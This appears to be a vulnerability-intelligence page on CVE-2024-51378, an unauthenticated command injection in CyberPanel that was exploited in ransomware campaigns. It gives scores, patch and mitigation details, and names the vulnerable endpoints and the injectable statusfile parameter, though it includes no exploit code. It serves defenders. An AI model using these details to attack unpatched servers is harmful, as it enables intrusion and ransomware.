Cyber Resilience

CVE-2024-51378

CriticalCISA KEVActive ExploitationEUVD ExploitedPublic PoCRansomware-linkedRCE

Published: 29 October 2024

Published
29 October 2024
Modified
07 November 2025
KEV Added
04 December 2024
Patch
CVSS Score v3.1 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Score 0.9385 99.9th percentile
Risk Priority 96 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-51378 is a critical-severity OS Command Injection (CWE-78) vulnerability in Cyberpanel Cyberpanel. Its CVSS base score is 10.0 (Critical).

Operationally, ranked in the top 0.1% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Deeper analysis

CyberPanel versions through 2.3.6 and unpatched 2.3.7 contain an OS command injection vulnerability in the getresetstatus functions of dns/views.py and ftp/views.py. The flaw allows remote attackers to bypass secMiddleware, which is applied only to POST requests, and execute arbitrary commands by supplying shell metacharacters in the statusfile parameter to the /dns/getresetstatus or /ftp/getresetstatus endpoints.

Unauthenticated attackers reachable over the network can exploit the issue to obtain full system compromise with impacts to confidentiality, integrity, and availability. The vulnerability carries a CVSS score of 10.0 and was observed being exploited in the wild in October 2024.

The project advisory and changelog describe mitigation through application of the patch at commit 1c0c6cbcf71abe573da0b5fddfb9603e7477f683, which addresses the authentication bypass and command injection paths in the affected views.

The current EPSS of 0.9385, with a peak of 0.9410, aligns with confirmed real-world exploitation activity against the product.

EU & UK References

Vulnerability details

getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters…

more

in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.

CWE(s)
KEV Date Added
04 December 2024

Related Threats

Threat-Actor AttributionAI

PSAUX
Exploited CyberPanel zero-day in Oct 2024 mass ransomware campaign per BleepingComputer and CISA KEV ransomware-use entry.

Affected Assets

cyberpanel
cyberpanel
≤ 2.3.8

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly blocks the unauthenticated access to /dns/getresetstatus and /ftp/getresetstatus that bypasses secMiddleware.

prevent

Requires validation and sanitization of the statusfile parameter to reject shell metacharacters that enable command injection.

respond

Mandates prompt application of the patch in commit 1c0c6cb to eliminate the authentication-bypass and command-execution paths.

References